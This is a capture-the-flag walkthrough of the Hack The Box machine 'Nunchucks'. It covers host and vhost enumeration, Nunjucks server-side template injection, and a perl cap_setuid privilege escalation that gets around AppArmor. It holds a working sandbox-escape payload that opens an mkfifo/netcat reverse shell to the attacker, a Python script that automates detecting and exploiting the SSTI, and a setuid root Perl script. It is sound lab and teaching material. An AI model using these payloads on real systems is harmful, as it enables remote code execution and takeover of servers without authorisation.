Nunchucks

Name: Nunchucks
Release Date: 28 Oct 2021
Retire Date: 02 Nov 2021
OS: Linux
Base Points: Easy - Retired [0]
Creator: TheCyberGeek
Pentest Workshop PDF: Nunchucks.pdf

As usual, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.11.122

Sidenote: Newer versions of Kali no longer run as root by default, so autorecon needs sudo; the UDP (and SYN) scans it runs need raw sockets, which require root.

We have SSH (TCP 22), HTTP (TCP 80) and HTTPS (TCP 443) to deal with. Navigating to http://10.10.11.122 gives "Unable to Connect", while https://10.10.11.122 pulls up a sales page. The autorecon output for TCP 80 explains the difference: nmap reports "Did not follow redirect to http://nunchucks.htb", so port 80 redirects to a hostname our box cannot resolve yet. We need to add it to /etc/hosts:

 

vi /etc/hosts

10.10.11.122 nunchucks.htb

<ESC>:wq!<RETURN>

Notice that the domain name also redirects to HTTPS and shows us exactly the same page. Fire up Gobuster in vhost mode and have a look at the results:

 

gobuster vhost -u https://nunchucks.htb -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t50 -o nunchucks.out  

  
┌──(kali㉿kali)-[~/Desktop/HTB/Nunchucks]
└─$ gobuster vhost -u https://nunchucks.htb -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t50 -o nunchucks.out    
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          https://nunchucks.htb
[+] Method:       GET
[+] Threads:      50
[+] Wordlist:     /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/01/22 02:36:56 Starting gobuster in VHOST enumeration mode
===============================================================
Found: store.nunchucks.htb (Status: 200) [Size: 4029]
Found: Store.nunchucks.htb (Status: 200) [Size: 4029]
                                                     
===============================================================
2022/01/22 03:21:09 Finished
===============================================================

Notice that we used "vhost" instead of "dir" in the Gobuster command. dir brute-forces paths on one host; vhost sends each wordlist entry as the Host header of a request to the same IP and reports the names whose response differs from the default site. That is also why store.nunchucks.htb and Store.nunchucks.htb both show up with an identical size: hostnames are case-insensitive, so the second hit is the same virtual host, not a new one. We found the store.nunchucks.htb sub-domain and need to add it to our /etc/hosts file the same way we did above for nunchucks.htb.
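To show what vhost mode does under the hood, here is an added example (not part of the original write-up, and not gobuster's code): it sends each candidate name as the Host header to the target IP and keeps only the responses that differ from a baseline taken with a name that cannot exist. The target IP and domain come from the scan above; the candidate list and the use of HTTP status plus body size as the comparison key are assumptions of the example, and the fetch function is injectable so the selection logic can be exercised offline.

```python
import secrets
import ssl
import urllib.error
import urllib.request


def fetch(ip, host, scheme="https", timeout=10.0):
    """GET / from the IP with an explicit Host header, which is what gobuster
    vhost mode does for every wordlist entry. Returns (status, body length)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # lab cert is self-signed, like gobuster -k
    req = urllib.request.Request(f"{scheme}://{ip}/", headers={"Host": host})
    try:
        with urllib.request.urlopen(req, context=ctx, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())


def vhost_scan(ip, domain, words, fetch=fetch):
    """Return {host: (status, size)} for every name whose response differs
    from a baseline taken with a random Host that cannot exist.

    Names are lowercased and de-duplicated before probing because Host
    matching is case-insensitive: that is why gobuster reported both
    store.nunchucks.htb and Store.nunchucks.htb with the same size."""
    baseline = fetch(ip, f"{secrets.token_hex(6)}.{domain}")
    found = {}
    seen = set()
    for word in words:
        word = word.strip()
        host = f"{word.lower()}.{domain}"
        if not word or host in seen:
            continue
        seen.add(host)
        result = fetch(ip, host)
        if result != baseline:
            found[host] = result
    return found


if __name__ == "__main__":
    # Usage: python3 vhosts.py 10.10.11.122 nunchucks.htb wordlist.txt
    import sys

    ip, domain, wordlist = sys.argv[1:4]
    with open(wordlist) as fh:
        hits = vhost_scan(ip, domain, fh)
    for host, (status, size) in hits.items():
        print(f"Found: {host} (Status: {status}) [Size: {size}]")
```

Because the comparison key is the whole (status, size) pair, a site that returns the default page with HTTP 200 for unknown names still filters correctly; a name is only reported when the server actually serves something different.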

There's no store yet, only a form to sign up for a newsletter. Depending on how the site validates input (and a myriad of other things), several web app attacks are worth trying. One of them is Server-Side Template Injection (SSTI). The classic probe is a template expression such as {{7*7}}: if the server evaluates it, the number 49 shows up in the output instead of the literal text. For more SSTI detection payloads, check out HackTricks. Enter {{7*7}}@nunchucks.htb as the email address and capture the response in Burp Suite to confirm the SSTI. In this particular case we don't "need" Burp, because the page itself displays the address as 49@nunchucks.htb, but it's good practice to use Burp in case the reflection only appears in the raw response.

Since we did get 49 back, we have confirmed that the site is vulnerable to SSTI. The template engine here is Nunjucks, and a simple Google search for Nunjucks template injection turns up a well-known payload that escapes the sandbox via range.constructor: range is a built-in template function, its constructor is JavaScript's Function, and calling Function(source)() runs arbitrary code inside the Node process. With that, we can build an injection that spawns a reverse shell back to our netcat listener:

 

On Attacking Machine:

nc -lvnp 1337

 

Send the POST to /api/submit to Repeater and replace the email value with the payload below (the backslashes escape the double quotes inside the JSON string):

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR TUN0 IP> 1337 >/tmp/f')\")()}}
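The detection and exploitation steps above, scripted, as an added example that is not part of the original write-up: it assumes, based on the escaped quotes in the payload, that the form POSTs a JSON body with an "email" field to /api/submit on store.nunchucks.htb and that the response echoes the submitted address; the listener IP and port are whatever you pass on the command line. The JSON encoding is done by json.dumps, which produces the backslash escapes that had to be typed by hand in Repeater.

```python
import json
import ssl
import urllib.request

# Assumed endpoint (from the write-up's Repeater step); response is assumed
# to echo the submitted address.
TARGET = "https://store.nunchucks.htb/api/submit"

# Detection probe: an evaluated template turns 7*7 into 49.
PROBE = "{{7*7}}@nunchucks.htb"

# Nunjucks sandbox escape from the write-up. `range` is a built-in template
# function, so range.constructor is Function, and Function(src)() executes
# src in the Node process. Uses %-formatting because the braces would clash
# with str.format.
RCE_TEMPLATE = (
    "{{range.constructor(\"return global.process.mainModule"
    ".require('child_process').execSync('%s')\")()}}"
)


def is_ssti(response_text):
    """True if the server evaluated the probe rather than reflecting it."""
    return "49@nunchucks.htb" in response_text and "{{7*7}}" not in response_text


def rce_payload(command):
    """Wrap a shell command (no single quotes) in the Nunjucks escape."""
    return RCE_TEMPLATE % command


def reverse_shell_command(lhost, lport):
    """The mkfifo/nc reverse shell from the write-up."""
    return (
        "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|"
        f"nc {lhost} {lport} >/tmp/f"
    )


def encode_body(email):
    """JSON-encode the form field; json.dumps adds the \\" escapes."""
    return json.dumps({"email": email}).encode()


def submit(email, url=TARGET, timeout=10.0):
    """POST one email to the form, trusting the lab's self-signed cert."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        url,
        data=encode_body(email),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, context=ctx, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Usage: nc -lvnp 1337, then python3 ssti.py <tun0 ip> 1337
    import sys

    lhost, lport = sys.argv[1], int(sys.argv[2])
    if not is_ssti(submit(PROBE)):
        sys.exit("probe was not evaluated; no SSTI here")
    print("SSTI confirmed, sending reverse shell")
    try:
        submit(rce_payload(reverse_shell_command(lhost, lport)), timeout=5)
    except Exception:
        # execSync blocks while the shell is connected, so the HTTP request
        # timing out is the expected sign that the payload ran.
        pass
```

The usual root cause for this class of bug is that the submitted value is concatenated into the template source and rendered, instead of being passed to the renderer as a context variable; the fix on the application side is to render a fixed template and supply the email as data.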

We have a foothold as david. We can upgrade our shell to a TTY using:

 

python3 -c 'import pty; pty.spawn("/bin/bash")'

 

Grab the user.txt flag and begin our privesc enumeration (LinPEAS and/or LinEnum).

 

david@nunchucks:~$ cat user.txt
891029b0bd7f13f2731b075bdaabf354

 

LinEnum shows the cap_setuid file capability set on /usr/bin/perl (getcap reports it as cap_setuid+ep, i.e. permitted and effective), which lets any user who can run perl call setuid(0). This is another GTFOBins box. I love GTFOBins. They are so fun to play with.

The one wrinkle is AppArmor (annoying thing that it is): the GTFOBins one-liner that runs perl directly fails with "Operation not permitted", because /usr/bin/perl has an AppArmor profile that blocks the setuid call. A script started through its #!/usr/bin/perl shebang is not confined by that profile, so all we need to do is create a simple Perl script and we should have a shell as root.
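Triage of getcap output, as an added example that is not LinEnum's or GTFOBins' code: it parses both output formats getcap has used (older "path = caps+flags" and newer "path caps=flags"), looks only at capabilities that are at least permitted, and flags the ones that give a path to root. The sample lines are constructed for the example (they mix both formats on purpose) and the list of dangerous capabilities is the example's own choice, not a complete one.

```python
import re
import subprocess

# Capabilities that let an ordinary process become root or read anything.
# Partial list, chosen for triage; the reason is what GTFOBins would use.
DANGEROUS = {
    "cap_setuid": "can call setuid(0): interpreters (perl, python) give a root shell",
    "cap_setgid": "can switch to any group, e.g. shadow",
    "cap_dac_override": "bypasses file permission checks",
    "cap_dac_read_search": "reads any file, e.g. /etc/shadow or root's SSH keys",
    "cap_sys_admin": "mount/namespace tricks lead to root",
    "cap_sys_ptrace": "can inject into processes running as root",
    "cap_sys_module": "can load kernel modules",
    "cap_chown": "can take ownership of any file",
    "cap_fowner": "can chmod any file",
    "cap_setfcap": "can grant itself any other file capability",
}

# One clause of a capability text, e.g. "cap_setuid+ep" or "cap_setuid=ep".
CLAUSE_RE = re.compile(r"^(?P<names>[a-z0-9_,]+)(?P<op>[+=-])(?P<flags>[eip]*)$")

# Constructed sample in both formats:
#   libcap <= 2.41:  /usr/bin/perl = cap_setuid+ep
#   libcap >= 2.42:  /usr/bin/perl cap_setuid=ep
SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.30.0 = cap_setuid+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/python3.8 cap_setuid=p
"""


def parse_getcap(output):
    """Yield (path, {capability: flags}) for each line of `getcap -r /`."""
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        rest = rest.lstrip("= ")  # old format puts " = " between path and caps
        caps = {}
        for clause in rest.split():
            m = CLAUSE_RE.match(clause)
            if not m or m["op"] == "-":
                continue
            for name in m["names"].split(","):
                caps[name] = m["flags"]
        yield path, caps


def triage(output):
    """Return [(path, cap, flags, reason)] for dangerous caps in the
    permitted set. Without 'e' the program must raise the capability itself,
    which stock interpreters do not do, so 'ep' is the directly usable case."""
    hits = []
    for path, caps in parse_getcap(output):
        for cap, flags in caps.items():
            if cap in DANGEROUS and "p" in flags:
                hits.append((path, cap, flags, DANGEROUS[cap]))
    return hits


if __name__ == "__main__":
    # On the target: python3 captriage.py   (runs getcap itself)
    proc = subprocess.run(["getcap", "-r", "/"], stdout=subprocess.PIPE,
                          stderr=subprocess.DEVNULL, text=True)
    for path, cap, flags, reason in triage(proc.stdout):
        print(f"{path}: {cap}+{flags}  -> {reason}")
```

On this box the interesting line is /usr/bin/perl = cap_setuid+ep; the ping and gst-ptp-helper entries are normal distro defaults and are ignored because cap_net_raw and friends do not lead to root.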

 

#!/usr/bin/perl
# Run as ./root.pl (after chmod +x), not as "perl root.pl": the AppArmor
# profile is attached to /usr/bin/perl itself, and a script started through
# its shebang line is not confined by it.

use POSIX qw(setuid);

# Succeeds for an unprivileged user only because /usr/bin/perl carries cap_setuid
POSIX::setuid(0) or die "setuid(0) failed: $!\n";

exec "/bin/bash";

 

I like to create the script on my attacking box and wget it onto the victim machine; Vim tends to behave very weirdly in a reverse shell that is not a proper TTY. Once it is there, make it executable and run it directly (./root.pl) so the shebang is used rather than invoking perl on it by hand.

root@nunchucks:~# cat /root/root.txt
165be6ba57e60d1450789a97d473bf15

 

With that, we are root! Grab the flag and we've completed another box! Congrats!